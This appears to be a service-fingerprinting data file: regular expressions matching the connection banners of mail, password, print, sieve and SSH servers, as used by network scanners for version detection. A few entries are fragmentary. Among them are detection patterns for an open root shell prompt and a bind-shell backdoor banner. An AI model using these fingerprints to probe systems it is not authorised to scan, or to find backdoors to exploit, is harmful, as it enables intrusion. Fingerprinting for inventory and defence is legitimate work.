+\+OK ArGoSoft Mail Server POP3 Module v\.([\w._-]+) at +\+OK ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-.\w]+ \(([-.\w]+)\)\r\n +\+OK ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ArGoSoft Mail Server Plus for WinNT/2000, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ([-.\w]+) Execmail POP3 \((\d[^)]+)\) +\+OK ([-.\w]+) POP3? MDaemon ready using UNREGISTERED SOFTWARE ([\d.]+) \r\n +\+OK ([-\w_.]+) POP MDaemon ([\d.]+) \xd7\xbc\xb1\xb8\xba\xc3 \r\n +\+OK ([-.\w]+) POP3 server \(Post\.Office v([-.\w]+) release ([-.\w]+) with ZPOP version ([-.\w]+)| p/Post.Office pop3d/ v/2 release 3/ i|w/ZPOP 4 +\+OK CommuniGate Pro POP3 Server ([-.\w]+) ready +\+OK CommuniGate Pro POP3 Server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK\r\n +\+OK POP3 v?([\d.]+) server ready <[\w.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <\w{11}>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready <([-.\w@:]+)>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready < +\+OK Kerio MailServer (\d[-.\w]+) patch ([\d.]+) POP3 server ready <[\d.]+@\(null\)>\r\n +\+OK Stalker POP3 Server ([\w.]+) at ([-\w_.]+) ready <.*>\r\n +\+OK ([-\w_.]+) POP3 service \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK Messaging Multiplexor \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK InterMail POP3 server ready\.\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@unspecified.host>\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +\+OK [-\w_.]+ PopMax version ([\d. ]+) POP3 Mail Server Ready, Willing, and Waiting\r\n +\+OK POP3 Welcome to GNU POP3 ([-\d.]+) <[\d.]+@([-\w_.]+)>\r\n +\+OK popserver ([\d.]+) pop3 server ready\r\n +\+OK ([-\w_.]+) NetMail POP3 Agent \R...sion: ([\d.]+) \\r\n +\+OK POP3 server ready \(Worldmail ([\d.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 WorkgroupMail ([\d.]+) .*\r\n +\+OK POP3 server ready \(LSMTP v([\w.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK MERCUR POP3-Server \(v([\d.]+) \w+\) for Windows NT ready <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready QuickMail Pro Server for MacOS ([\d.]+) <[\w.]+@([-\w_.]+)>\r\n +\+OK ready\r\n +\+OK POP3 ([-\w_.]+) \(Version ([-\w.]+)\) http://surgemail\.com\r\n +\+OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+) < +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) POP3 Server\] service ready; +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) \(Linux/Ix86\) POP3 Server\] service ready; +\+OK Samsung Contact POP3 interface ready on: ([-\w_.]+)\r\n +\+OK ([-\w_.]+) POP3 service \(Sun Java\(tm\) System Messaging Server ([-\d.]+) \(built .*\) +\+OK Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\+OK ([-\w_.]+) POP3 server \(DeskNow POP3 Server ([\d.]+)\) ready \r\n +\+OK POP3 SINA \(([-\d.]+)\) Server Ready\r\n +\+OK POP3 on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +\+OK \(POP3\) hMailServer ([-\w.]+)\r\n +\+OK Welcome to ([\w._-]+), with Code-Crafters Ability Mail Server ([\w._-]+) <[\d.]+@[\w._-]+>\r\n +\+OK DAWKCo POP3 Server v([-\w_.]+) ready < +\+OK Welcome to ([-\w_.]+), powered by Ocean Mail Server ([\d.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) Solstice \(tm\) Internet Mail Server \(tm\) POP3 ([\d.]+) +\+OK Welcome to RaidenMAILD POP3 service v([\d.]+), +\+OK POP3 FTGate6 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK MERCUR POP3-Server \(v([-\w_.]+) \w+\) for Windows ready <[\d.]+@([-\w_.]+)>\r\n +\+OK 4D Mail ([-\w_.]+) ready < +\+OK ([-\w_.]+) POP3 ([-\w_.()]+) w/IMAP client at +\+OK <-?[\d.]+@([-\w_.]+)>, POP3 server ready\.\r\n +\+OK POP3 server ready <[-0-9a-f]+@([-\w_.]+)>\r\n +\+OK Welcome to Arvixe POP3 server\.\r\n +\+OK POP3 Server ready\r\n +\+OK POP3 server ready\r\n +\+OK POP3 server ([-\w_.]+) ready <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) POP3 Server \(Version ([\w.]+)\) ready at <.*>\r\n +\+OK popd-([\d.]+) ready \r\n +\+OK POP3 server at ([-\w_.]+) ready <[\d.]+@ +-ERR Permission denied - closing connection\.\r\n +\+OK ([-\w_.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK ready <[\d.]+@([-\w_.]+)>\r\n +\+OK Scalix POP3 interface ready on: ([-\w_.]+)\r\n +\+OK POP3 Welcome to ([-\w_.]+) using the Internet Anywhere Mail Server Version: ([\d.]+)\. Build: (\d+) by True North Software, Inc\. +\+OK Welcome to mpopd V([\d.]+)\.\.\.\. :\)\r\n +\+OK [-\w_.]+ Welcome to the mail server\.\r\n +\+OK CMailServer ([\d.]+) POP3 Service Ready\r\n +\+OK ([-\w_.]+) running EIMS X ([\w.]+) < +\+OK POP3 server \(Neon Mail Server System Advance ([-\w_.]+), [^)]*\) ready ([-\w_.]+)\. < +\+OK Welcome to the Atmail POP3 server - Login with user@domain\.\r\n +\+OK Dovecot DA ready\.\r\n +Unable to open trace file \"/var/spool/popper/ +\+OK POP3D\(\*\) Server PMDFV([\w._-]+) at .* <\w+@([\w._-]+)>\r\n +\+OK Pop3 ready\.\r\n +\+OK ([\w._-]+) Cyrus POP3 v([\w._-]+)-OS X Server ([\w._-]+):\t9L1 server ready <[\d.]+@[\w._-]+>\r\n +\+OK Kerio Connect ([\w._ -]+) POP3 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK Welcome NewsGator Online Services POP3 Server version ([\w._-]+)\r\n +\+OK POP3 AnalogX Proxy (\d[-.\w]+) \(Release\) ready\.\n +Proxy\+ POP3 server\. Insecure access - terminating\.\r\n +\+OK Proxy-POP server \(DeleGate/([\d.]+) by ysato AT delegate DOT org\) at ([-\w_.]+) starting\.\r\n +\+OK POP3 Y(?:ahoo)?POPs! proxy ready\r\n +\+OK POP3 \(Spampal\) server ready \(USER command must include mailserver name\)\r\n +\+OK Mirapoint POP3PROXY ([-\w.]+) server ready\r\n +\+OK AVG POP3 Proxy Server Beta - ([\d/.]+) \[[\d.]+\]\r\n +\+OK AVG POP3 Proxy Server ([\d/.]+) \[[\w/.]+\]\r\n +\+OK AVG POP3 Proxy Server <[\w.]+@[-\w_.]+> ([\d/.]+) \[[\d/.]+\]\r\n +-ERR AVG POP3 Proxy Server: Cannot connect to the mail server!\r\n +\+OK POP3 Spam Inspector Spam Filter Gateway Version ([\d.]+) Ready\.\r\n +\+OK MailMarshal\(([\d.]+)\) POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK HTML2POP3 server ready \(([\d.]+)\)\r\n +\+OK ([-\w_.]+) POP3 proxy ready\r\n +\+OK AVG POP3 Proxy Server <[\d.]+@([-\w_.]+)> ([\d.]+)/[\d.]+ \[[\d/.]+\]\r\n +\+OK InterScan VirusWall POP3 Proxy\r\n +-ERR 403 The requested host is forbidden by WinProxy\. See your network administrator\.\n +\+OK MrPostman webmail proxy ready\r\n +\+OK F-Secure/fsigk_pop/\d+/[-\w_.]+ starting\.\r\n +\+OK hello from popgate\(([\d.]+)\)\r\n +\+OK \[ISafe POP3 Proxy\] \r\n +\+OK <[\d.]+@([-\w_.]+)> \[ISafe POP3 Proxy\] \r\n +\+OK UserGate: forward ready\r\n-ERR UserGate: Mistake of the protocol\r\n +\+OK kingate pop3 proxy\r\n +\+OK avast! POP3 proxy ready\.\r\n +\+OK O3SIS UMA Proxy POP3 Server ([\w._-]+)\r\n +200 ([-._\w]+) poppassd v?([-._\w]+) +200 poppassd hello, who are you\?\r\n +200 hello there, who are you\?\r\n +200 hello there, please tell me who you are\r\n +200 poppassd v([\w.]+) for Digital Unix with C2 security Hello, who are you\?\r\n +200 ([-.+\w]+) MercuryW PopPass server ready\.\r\n| p|Mercury/32 poppass service +200 X1 NT-PWD Server ([-.+\w]+) \(IMail (\d[-.\w]+)\)\r\n +200 CommuniGate Pro PWD Server (\d[-.\w]+) ready < +550 Login failed - already \d+/\d+ users connected sorry \(use G_CON_PERIP_EXCEPT to bypass\) \(IP=[\d.]+\)\r\n +200 Post\.Office v([\d.]+) password server ready\r\n +\+OK [-\[\]\(\)!,/+:<>@.\w ]+\r\n +lpd \[@([-\w_.]+)\]: connected from invalid port \(\d+\)\n| p|BSD/Linux lpd +lpd: Host name for your address \(\d+\.\d+\.\d+\.\d+\) unknown\n +([-\w_.]+): /usr/lib/lpd: Malformed from address\n +\d+-201 ill-formed FROM address\. +\0\.[\w._/-]+/Library/Preferences/PyCharm([\w._-]+)\0\)[\w._/-]+/Library/Caches/PyCharm[\w._-]+ +QAS2 +\0\0\x01V\xff\xff\xff\xff\xff\xffRT\0\x124V\x08\0E.\x01H...\0.\x11..\0\0\0\0\xff\xff\xff\xff\0D\0C\x014.{1,2}\x01\x01\x06\0......\0{18}RT\0\x124V\0{202}c\x82Sc5\x01 +\r\nHello, this is [Qq]uagga \(version (\d[-.\w]+)\)\.\r\nCopyright 1996-200 +200-?RAP 1 ([-\w_.]+) ([-\w_.]+) radmind access protocol\r\n +\0.\0\x01\0\0\0\0.*\x0b\0\0\0\0([-\w_]+)\x00437 +_realplayfavs_::([\w\s]+)::connected\0 +(\d+\.\d+\.\d+) G\0\0\0\xb6\0.\t +\xe1\xe7\xef\xf0\0\0\x00.\(Righteous Backup Linux Agent\) ([^\xe1]+)\xe1\xe7\xe6\x07\0\x01\0 +\xe1\xe7\xe6\x07\0\x01\0 +roku: ready\r\n +\+host=cashew version=([\d.]+) uptime=[\d+:]+ audio-bits=\d+ audio-byte-order=\w+-endian +\0\0\0.NI_RTERR\0.\0\0\xff\xff\xff\xfb\0\0\0.\*ERR\*\x001\0connection timed out\0-5\0NI \(network interface\)\x007\d0\x003\d\0nirout\.cpp\x00\d\d\d\d\0RTPENDLIST::timeoutPend: CONNECTED timeout\0\w+ +\w+ +\d+ +\d+:\d+:\d+ +\d+\0\0\0\x0046\0SAProuter ([\w._ ()-]+) on '([\w._-]+)'\0\0\0\0\0\*ERR\*\0\0\0\0\0 +\x02\x1c50\x1c\x03\0\0\0\0 +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w._-]+-Debian[- ][\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved \(Murder\) v([-.\w]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w_.]+)-OS X ([^"]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v(\d[-.\w]+)\"\r\n| p/Cyrus timsieved/ v/1/ i|included w/cyrus imap +\"IMPLEMENTATION\" \"dovecot\"\r\n +\"IMPLEMENTATION\" \"DBMail timsieved ([\w._-]+)\"\r\n +/usr/share/pysieved/plugins/dovecot\.py:27: DeprecationWarning: The popen2 module is deprecated\. Use the subprocess module\.\n import popen2\n\"IMPLEMENTATION\" \"pysieved ([\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Dovecot Pigeonhole\"\r\n\"SIEVE\" \"[\w._;-]+(?:\s+[\w._;-]+)*\"\r\n\"NOTIFY\" \"mailto\"\r\n\"SASL\" \"[\w._;-]*(?:\s+[\w._;-]+)*\"\r\n\"STARTTLS\"\r\n\"VERSION\" \"([\w._-]+)\"\r\nOK \"Dovecot ready\.?\"\r\n +SGMS Scheduler SGMS (\d+) ([\d.]+) .*\n> +t\x03\0\0 +\x01remshd: Kerberos Authentication not enabled\.\n +\x01remshd: Error! Kerberos authentication failed +(?:ba)?sh-\d\.\d\d\w?# +:: w4ck1ng-shell \(Private Build v([\w._-]+)\) bind shell backdoor :: \n\n +GENERAL: \d+ \d+\n +220 SLNP (\w+)@[vV]ersion:\s?V?([^@]+)@user:([^@]+)@pid:\d+\n +220 ([-\w_.]+) PGP Universal service ready \(proxied server greeted us with: (.*)\)\r\n +220 ([-/.+\w]+) MailGate ready for ESMTP on +220 ([-/.+\w]+) SMTP ready to roll\r\n +220 ([-/.+\w]+) Internet Rex ESMTP daemon at your service\.\r\n +220 ([-.+\w]+) ESMTP NetIQ MailMarshal \d[-.\w]+ Service Pack (\w+) \(v(\d[-.\w]+)\) Ready\r\n +554-([-.+\w]+)\.us\r\n554 Access denied\r\n +220.*?MERCUR SMTP[\s-]Server \(v([^)]+)\) for ([-.\w ]+) ready at +220 ([-.\w\d]+) ESMTP \([a-fA-F0-9]{32}\)\r\n +554 Service unavailable; Client host \[[\w._-]+\] blocked using Barracuda Reputation; +220 ([-.+\w]+) Mercury/32 v(\d[-.\w]+) ESMTP server ready\.\r\n| p|Mercury/32 smtpd +520 Connection not authorised from this address\.\r\n +554 SMTP service not available\r\n +220 ([-\w_.]+) <1\d+\.\d+@[-\w_.]+> \[XMail (\d[-.\w]+) ESMTP Server\] service ready +421 \[XMail ([\d.]+) \(Linux/Ix86\) ESMTP Server\] - Server does not like Your IP\r\n| p/XMail SMTP server/ v/1/ i|Linux/x86 +220 ([-.\w]+) FirstClass ESMTP Mail Server v(\d[-.\w]+) ready\r\n +220 ([-.\w]+) AppleMailServer (\d[-.\w]+) SMTP Server Ready\r\n +220 ([-.\w]+) eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) ESMTP server ready \.\.\.\r\n +220 ([-.\w]+) service desk (\d[-.\w]+) SMTP Service Ready for input\.\r\n +220 ([-.\w]+) VPOP3 SMTP Server Ready\r\n +421 Insufficient System Storage\.\(IMail ([\d.]+)\)\r\n +220 \[?([-.+\w]+)\]? Microsoft ESMTP MAIL Service, Version: ([-\w.]+) ready +220 ([-\w_.]+) Microsoft ESMTP MAIL Service ready at +220 ([\w._-]+) Microsoft ESMTP MAIL Service Version: ([\w._-]+)\r\n +220 ([-.+\w]+) ESMTP Server \(Microsoft Exchange Internet Mail Service ([-\w.]+)\) ready +220 \+OK Microsoft Exchange SMTP server version ([\d.]+) +220[- ].*\r\n220[- ]([^\r\n]+) ESMTP Exim +220 CheckPoint FireWall-1 secure ESMTP server\r\n +220 CheckPoint FireWall-1 secure SMTP server\r\n +220 ([-.+\w]+) running IBM AS/400 SMTP V([\w]+)| p|IBM AS/400 smtpd +220 ([-.+\w]+) ESMTP MailEnable Service, Version: (\d[\w.]+)- ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: \d+--([\d.]+) ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) ready at +530 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) denied access at +220 ([-.+\w]+) SMTP/smap Ready\.\r\n +220 ([-.+\w]+) ESMTP service \(Netscape Messaging Server ([-.+ \w]+) \(built +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) NTMail \(v([-.+\w]+)/.* ready +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) ESMTP Postfix\r\n +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) Microsoft ESMTP MAIL Service, Version: ([\d.]+) ready at +220 Trend Micro ESMTP ([-.+\w]+) ready\.\r\n +220(\S+) WebShielde(\w+)/SMTP Ready. +220 ([-.+\w]+) ESMTP MailMasher ready to boogie\r\n +220 ([-.\w]+) ESMTP Postfix \(([-.\w]+)\) \(([-.\w ]+)\) +220 [\*\d\ ]{2,300}\r\n +220 ArGoSoft Mail Server Pro for WinNT/2000/XP, Version ([-.\w]+) \(([-.\w]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w_.]+) ArGoSoft Mail Server Freeware, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-.\w]+) ESMTP Service. Welcome.\r\n +220 ([-.\w]+) Mercury (\d[-.\w]+) ESMTP server ready\.\r\n +220 ESMTP Service \(Lotus Domino Release ([\w._-]+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Release (\d[-.\w ]+)\) ready +220 ([-.\w]+) ESMTP Service \(Lotus Domino (\d[-.\w ]+)\) ready at +220 ESMTP Service \(Lotus Domino Build V([\w_]+) Beta (\w+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Versione ([\w._ -]+)\) ready +220 ([-.\w]+) Lotus SMTP MTA Service Ready\r\n +220 ([-.\w]+) WebSTAR Mail Simple Mail Transfer Service Ready\r\n +220 ([-.\w]+) SMTP NAVGW (\d[-.\w]+); +220 ([-.\w]+) Kerio MailServer (\d[-.\w]+ patch \d+) ESMTP ready\r\n +220 YSmtp(\S+) ESMTP service ready +220 (\S+) ESMTP WEB.DE V([^\s\;]+) +220 Compuserve Office Mail Service \(lnxc-(\d+)\) ESMTP +220 Welcome to Nemesis ESMTP server on \S+ +220 (\S+).*?SMTP \(Sun Internet Mail Server sims.(\d[^\)]+)\) +220 (\S+) ESMTP XWall v(\d\S+) +220 (\S+) eMail Sentinel (\d+) ESMTP Service ready +220 ([-\w_.]+) Service ready by DvISE PostMan \((\d+)\) ESMTP Server \(Tobit Software, Germany\)\r\n +220 ([-\w_.]+) -- Server ESMTP \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +220 (\S+) -- Server ESMTP \(Sun Java System Messaging Server (\d[^\(\)]+) +220[- ][^ ]+ Smail-([^ ]+) +220-([-\w_.]+) Stalker Internet Mail Server V\.([\w.]+) is ready\.\r\n +220 ([-\w_.]+) ESMTP MailMax ([\d.]+) [A-Z][a-z][a-z].*\r\n +220 ([-\w_.]+) Mailmax version ([\d. ]+) ESMTP Mail Server Ready \r\n +220 ([-\w_.]+) running IBM MVS SMTP CS V2R10 on .*\r\n +220 [-\w_]+ ESMTP ([-\w_.]+) \(Debian/GNU\)\r\n +220 ESMTP \(Debian/GNU Mewwwwwww\)\r\n +220 ([\w._-]+) [\w._-]+ ESMTP Postfix \(Debian/GNU\) +220 ([-\w_.]+) ESMTP postfix NO UCE\r\n +220 ([-\w_.]+) SMTPD Server - Postfix\r\n +220 ([-\w_.]+) ESMTP Oracle Email Server SMTP Inbound Server\t([\d.]+) \t Ready\r\n +220 ([-\w_.]+) Mail essentials server \(([\d.]+)\) ready for ESMTP transfer\r\n +220 ([-\w_.]+) ESMTP - WinRoute Pro ([\d.]+)\r\n +220 ([-\w_.]+) ESMTP Lyris ListManager service ready\r\n +220 ESMTP Lyris service ready\r\n +220 ESMTP Lyris ListManager service ready\r\n +220 ([-\w_.]+) SMTP Ready 12\.\r\n +220 ([-\w_.]+) ESMTP server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) ZMailer Server ([\w.]+) #\d+ ESMTP ready at .*\r\n +220 Coremail SMTP\(Anti Spam\) System \(\w+\[(\d+)\]\)\r\n +220 ([-\w_.]+) \(PowerMTA(?:\(TM\)) v([\w.]+)\) ESMTP service ready\r\n +220 ([-\w_.]+) ESMTP BorderWare MXtreme Mail Firewall\r\n +220 ([-\w_.]+) SMTP Server \(JAMES SMTP Server\) ready +220 ([-\w_.]+)\s+ESMTP MDaemon ([\d.]+); .*\r\n +220[ -]([-\w_.]+) ESMTP MSA MDaemon ([\d.]+); +421 Sorry, SMTP server too busy right now \(193\); try again later\r\n +220 ([-\w_.]+) ESMTP HT Mail Server v([\d.]+); .*\r\n +220 ([-\w_.]+) ESMTP IceWarp ([\d.]+)[; ] +220 ([-\w_.]+) ESMTP Gruponet IE2020 ([\d./]+);\r\n +220 ([-\w_.]+) mailfront ESMTP\r\n +220 ([-\w_.]+) SMTP Server SLmail ([\d.]+) Ready ESMTP spoken here\r\n +220 ([-\w_.]+) VaMailArmor-([\d.]+)\r\n +220 ([-\w_.]+) ESMTP MailFrontier \(([\d.]+)\)\r\n +220 ([-\w_.]+) WindowsNT SMTP Server v([\w/.]+) ESMTP ready at .*\r\n +220 ([-\w_.]+) \(LSMTP for Windows NT v([\w.]+)\) ESMTP server ready\r\n +220 ([-\w_.]+) SMTP Mandamail ([\d.]+)/[\d.]+\r\n +500 Permission denied - closing connection\.\r\n +220 \(SMTP\) hMailServer ([\d.]+) - Up since .*\r\n +220 ([-\w_.]+) Ready for action \(Mailtraq ([\d.]+)/E?SMTP\)\r\n +220 ([-\w_.]+) SMTP Service Ready \(QuickMail Pro Server for MacOS ([\d.]+)\)\r\n +220 LiteMail SMTP Server Ready\.\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow SMTP Server ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow\) ready +220 network-box ESMTP\r\n +220 ESMTP on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +220 ([-\w_.]+) AntiVir MailGate\r\n +220 server ESMTP KEN! v([\d.]+); .*\r\n +220 ([-\w_.]+) NTMail \(v([\d.]+)/[\w.]+\) ready for ESMTP transfer \r\n +220-([-\w_.]+) Sendmail IBM OS/2 SENDMAIL VERSION ([\w./]+) ready at .*\r\n220 ESMTP spoken here\r\n| p/Sendmail smtpd/ v/2/ o|OS/2 +220 shttp\.srv Simple Mail Transfer Service Ready\r\n +501 Domain must resolve\r\n +220 ([-\w_.]+) ModusMail ESMTP Receiver Version ([\d.]+) Ready\r\n +220 mailmatrix SMTP Server \(Mail Matrix Server\) ready +220-([-\w_.]+) ESMTP .* GoMail V([\d.]+); +220 [-\w_.]+ Winmail Mail Server ESMTP ready\r\n +220 ([-\w_.]+); .* \+\d+\r\n +421 unable to read controls \(#4\.3\.0\)\r\n +554 Please check that your outgoing mail server settings are correct\. Contact your service provider's technical support for assistance\.\n +rblsmtpd: [\d.]+ pid \d+:.*220 rblsmtpd\.local\r\n +220 SurgeSMTP \(Version ([-\w_.]+)\) http://surgemail\.com\r\n +220 ([-\w_.]+) Welcome to RaidenMAILD E?SMTP service v([\d.]+), +220 ESMTP on WinWebMail \[([\d.]+)\] ready\. http://www\.winwebmail +220-W E L C O M E T O Q U A R K M A I L S M T P S E R V I C E !\r\n220 ([-\w_.]+) ESMTP server \(quarkmail server - version ([\d.]+)\) ready +220 .*\r\n221 2\.7\.0 Error: I can break rules, too\. Goodbye\.\r\n +220 ([-\w_.]+) running EIMS X ([\w.]+)\r\n +220 DP-3510\r\n +220 ([-\w_.]+) Axigen ESMTP ready\r\n +421 Unexpected log failure, please try later\r\n +220 ([-\w_.]+) DynFX ESMTP Server ([-\w_.]+) \( +220 ;; ESMTP connection timed out; no servers could be reached Sendmail ([-\w_.]+)/ +554 ([-\w_.]+) ESMTP not accepting messages\r\n +220 ([-\w_.]+) L-Soft HDMail SMTP Service Version: ([-\w_.()]+) ready +220 ([-\w_.]+) Synchronet SMTP Server ([\d.]+)-Win32 Ready\r\n +220 ShareMailPro SMTP Server Ready \r\n +220 ([-\w_.]+) ESMTP Service\(Mail2000 ESMTP Server V([-\w_.]+)\) ready +220 ([-\w_.]+) 4D WebSTAR V Mail \(([-\w_.]+)\) Ready for action\r\n +220 Service ready KM([\w._-]+) smtpd\r\n +220 ([\w_.-]+) cqgreylist - minimal smptd\r\n +220 ([\w_.-]+) ESMTP AnNyungSMTP ([\w._-]+); +220 DP-1820E\r\n +220 ([\w_.-]+) VHCS2 [\w._-]+ (\w+) Managed ESMTP ([\w._-]+)\r\n +220.*SMTP Welcome to the IA eMailServer Standard Edition Version: ([\d.]+ Build: [\d]+) +220 ([\w_.-]+) bizsmtp ESMTP server ready\r\n +220 ([\w_.-]+) ESMTP NetBox\(tm\)\r\n +220 ([\w_.-]+) StrongMail SMTP Service Version: (\S+) ready +421 Service not available, closing transmission channel\r\n +421 Service not available, closing transmission channel \r\n +220 ([\w_.-]+) ESMTP OpenSMTPD\r\n +220 ([\w_.-]+) ESMTP Citadel server ready\.\r\n +220 BEJY V([\w._-]+) SMTP ([\w._-]+) \(c\) \d+-\d+ by BebboSoft, Stefan \"Bebbo\" Franke, all rights reserved ready\r\n +220 Welcome NGOS SMTP Server version ([\w._-]+)\r\n +220 ([\w._-]+) Kerio Connect ([\w._ -]+) ESMTP ready\r\n +220 ([\w._-]+) running IBM VM SMTP Level (\d+) on +421 4\.3\.2 Service not available\r\n +220 ([\w._-]+) Service ready by David\.fx \(([\w._-]+)\) ESMTP Server \(Tobit\.Software, Germany\)\r\n +220 HOST: ([\w._-]+) Supportworks ESMTP Server ([\w._-]+) ready\r\n +220 ([-\w_.]+) SMTP/DeleGate/([\d.]+) ready at .*\r\n +220 ([-/.+\w]+) SMTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220 ([-\w_.]+) ESMTP spamd IP-based SPAM blocker; .*\r\n +220 ESMTP smtprelay service ready\.\r\n +220 ([-\w_.]+) SMTP hotsmtpd v([\d.]+)\. ESMTP-HTTPMail Gateway based on hotwayd\.\r\n +220 ([-\w_.]+) Welcome SpamFilter for ISP SMTP Server v([\d.]+) - Unlicensed Evaluation Copy\r\n +421 proxyplus\.universe SMTP server\. Insecure access - terminating\.\r\n +220 AVG ESMTP Proxy Server Beta - ([\d./]+) \[[\d.]+\]\r\n +220 AVG ESMTP Proxy Server ([\d./]+) \[[\d./]+\]\r\n +554 ([\d.]+) ([-\w_.]+) No mail service\r\n +220 Traffic Inspector SMTP Gate \(SPAM protected\), ver\. ([\w._-]+), ready at.*\r\n +220 mailwall SMTP Server \(Ikarus MailWall by David Grabenweger\) ready\r\n +220 ([-\w_.]+) ESMTP - eXpurgate ([\d.]+) \( +220 CCProxy ([\d.]+) SMTP Service Ready\(Unregistered\)\r\n +NoSpamToday! SMTP Proxy Monitoring Service Ready\.\r\n +220 ([-\w_.]+) ESMTP bitdefender +220 ([-\w_.]+) ESMTP BitDefender Proxy version ([^\r\n]+)\r\n +220 [-\w_.]+ avast! SMTP proxy ready\.\r\n +220 ([-\w_.]+) (SCM\d+)/SMTP Ready\.\r\n +554 You are not allowed to connect\.\r\n +220 ([\w._-]+) ESMTP Symantec Brightmail Gateway\r\n +220 ([\w._-]+) ESMTP server ready \(Alligate v([\w._-]+)\)(?: AUTH ONLY)?\r\n +220 ([\w._-]+)\.ARK Sendmail ready\. \r\n +421 too many connections\r\n +220 ([-\w_.]+) ESMTP Service ready\r\n +220 ([\w._-]+) AVKSMTP Server\r\n +220 (\S+) Welcome to SpamFilter for ISP SMTP Server v(\d\S+) +220[\s-].*?E?SMTP[^\r]*\r\n +550 (\d.\d.\d) ([^\r\n]+) +Statistics from .*\n M msgsfr bytes_from msgsto bytes_to msgsrej msgsdis Mailer\n +220 ([-.\w]+) SNPP server \(HylaFAX \(tm\) Version ([-.\w]+)\) ready.\r\n +220 QuickPage v(\d[-.\w]+) SNPP server ready at +250\r\nProtocol-Version:(\d[\d.]+)\r\nMessage-ID:\d+\r\nDatabase .*\r\nContent-Length:\d+\r\nKey Length:(\d+)\r\n\r\n.*(\w:\\.*ini)\r\n\r\n +SPMD_ACK\0\0\x01\0\x01 +SSH-([\d.]+)-([\d.]+) F-Secure SSH Windows NT Server\r?\n +SSH-([\d.]+)-([\d.]+) dss F-SECURE SSH\r?\n +SSH-([\d.]+)-([\d.]+) F-SECURE SSH.*\r?\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+) - Process Software MultiNet\r\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+)\r?\n +SSH-(\d[\d.]+)-SSH Protocol Compatible Server SCS (\d[-.\w]+)\r?\n +SSH-([\d.]+)-SSH Compatible Server\r?\n +SSH-([\d.]+)-([\d.]+) SSH Secure Shell Tru64 UNIX\r?\n +SSH-([\d.]+)-(\d+\.\d+\.\d+) SSH Secure Shell +sshd: SSH Secure Shell (\d[-.\w]+) on ([-.\w]+)\nSSH-(\d[\d.]+)- +sshd2\[\d+\]: .*\r\nSSH-([\d.]+)-(\d[-.\w]+) SSH Secure Shell \(([^\r\n\)]+)\)\r?\n +SSH-([\d.]+)-(\d+\.\d+\.[-.\w]+) +SSH-([\d.]+)-OpenSSH_([\w._-]+) Debian-(\S*maemo\S*)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)[ -]{1,2}Debian[ -_]([^\r\n]+)\r?\n +SSH-([\d.]+)-OpenSSH_[\w.]+-FC-([\w.-]+)\.fc(\d+)\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD localisations (\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-(?:[\w.,]+)\r?\n 